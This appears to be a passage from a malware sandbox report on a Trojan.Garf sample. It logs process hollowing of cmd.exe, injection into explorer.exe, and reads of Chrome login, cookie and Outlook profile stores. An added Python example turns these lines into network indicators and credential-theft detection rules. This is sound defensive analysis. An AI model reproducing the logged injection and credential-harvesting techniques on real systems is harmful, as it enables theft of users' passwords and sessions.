Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Thread register set: target process: 3528
Source: C:\Windows\SysWOW64\cmd.exe Thread register set: target process: 3528
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Process created: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe
Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000004.00000000.327263504.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.574282998.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446841530.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.318203390.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.567226844.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000004.00000000.319269612.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.567677513.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004019C5 cpuid 1_2_004019C5
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_0040163B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040163B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
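The network, injection and credential-access lines in the two sections above are what a detection engineer turns into indicators and hunt logic: explorer.exe is the process beaconing to the listed hosts, the dropped vfpbkeeo.exe hollows cmd.exe and queues an APC into explorer.exe, and the hollowed cmd.exe then reads Chrome's Login Data, Cookies and Web Data plus the Outlook profile key. The Python below is an added example, not part of this report or of the sandbox's own tooling. It parses a constructed sample of the report's own lines (copied from the sections above) into network IOCs, a deduplicated process-injection chain, and credential-store reads by processes that are not the store's owner. The owner mapping (chrome.exe, outlook.exe), the technique labels and the helper names are the example's own assumptions.

```python
import re

# Constructed sample: one line per event type, copied from the behaviour
# sections of this report (with the page's "Jump to behavior" link text removed).
SAMPLE_LINES = r"""
Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: D90000
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Thread register set: target process: 3528
Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
"""

NET_RE = re.compile(r"^Source: (?P<src>.+?) Network Connect: (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<port>\d+)$")
DNS_RE = re.compile(r"^Source: (?P<src>.+?) Domain query: (?P<domain>\S+)$")
ACCESS_RE = re.compile(r"^Source: (?P<src>.+?) (?:File|Key) opened: (?P<obj>.+)$")
# Cross-process memory/thread operations the sandbox reports; the labels are this example's own.
INJECT_RES = [
    ("process hollowing (section unmapped)", re.compile(r"^Source: (?P<src>.+?) Section unmapped: (?P<dst>.+?) base address: [0-9A-Fa-f]+$")),
    ("section mapped", re.compile(r"^Source: (?P<src>.+?) Section loaded: unknown target: (?P<dst>.+?) protection: (?P<prot>.+)$")),
    ("APC queued", re.compile(r"^Source: (?P<src>.+?) Thread APC queued: target process: (?P<dst>.+)$")),
    ("thread context set", re.compile(r"^Source: (?P<src>.+?) Thread register set: target process: (?P<dst>.+)$")),
]
# Credential stores touched in this report, mapped to the one process expected to read them.
# Assumed owners; a real rule set would add Firefox, Edge, Thunderbird, and so on.
CREDENTIAL_STORES = {
    r"\google\chrome\user data\default\login data": "chrome.exe",
    r"\google\chrome\user data\default\cookies": "chrome.exe",
    r"\google\chrome\user data\default\network\cookies": "chrome.exe",
    r"\google\chrome\user data\default\web data": "chrome.exe",
    r"\windows messaging subsystem\profiles\outlook": "outlook.exe",
}


def _lines(text):
    # Tolerate pasted report lines that still carry the page's link text.
    return [ln.replace(" Jump to behavior", "").strip() for ln in text.splitlines()]


def basename(path):
    return path.rstrip("\\").rsplit("\\", 1)[-1].lower()


def network_iocs(text):
    """Sorted ip:port pairs and domains contacted, whichever process made the connection."""
    ips, domains = set(), set()
    for line in _lines(text):
        m = NET_RE.match(line)
        if m:
            ips.add(f"{m['ip']}:{m['port']}")
            continue
        m = DNS_RE.match(line)
        if m:
            domains.add(m["domain"].lower())
    return {"ips": sorted(ips), "domains": sorted(domains)}


def injection_chain(text):
    """(source, technique, target) edges in report order, deduplicated."""
    edges = []
    for line in _lines(text):
        for label, rx in INJECT_RES:
            m = rx.match(line)
            if not m:
                continue
            if label == "section mapped":
                # Only an executable mapping lets foreign code run inside the target.
                label = "RWX section mapped" if "execute" in m["prot"] else "RW section mapped"
            edge = (basename(m["src"]), label, basename(m["dst"]))
            if edge not in edges:
                edges.append(edge)
            break
    return edges


def credential_store_access(text):
    """(process, object) pairs where a process other than the store's owner opened it."""
    hits = []
    for line in _lines(text):
        m = ACCESS_RE.match(line)
        if not m:
            continue
        proc, obj = basename(m["src"]), m["obj"]
        for marker, owner in CREDENTIAL_STORES.items():
            if marker in obj.lower() and proc != owner:
                hits.append((proc, obj))
                break
    return hits


if __name__ == "__main__":
    print(network_iocs(SAMPLE_LINES))
    for src, how, dst in injection_chain(SAMPLE_LINES):
        print(f"{src} --[{how}]--> {dst}")
    for proc, obj in credential_store_access(SAMPLE_LINES):
        print(f"credential store read by {proc}: {obj}")
```

Run on the sample, the chain comes out as vfpbkeeo.exe hollowing cmd.exe, both of them mapping executable sections into explorer.exe, and vfpbkeeo.exe queueing an APC into explorer.exe; the credential-store check flags every cmd.exe read because cmd.exe is never the owner of a browser or mail profile, while the same read from chrome.exe is ignored. The "Thread register set" target is a bare PID in this report, so that edge carries the PID rather than an image name.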

Remote Access Functionality

Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY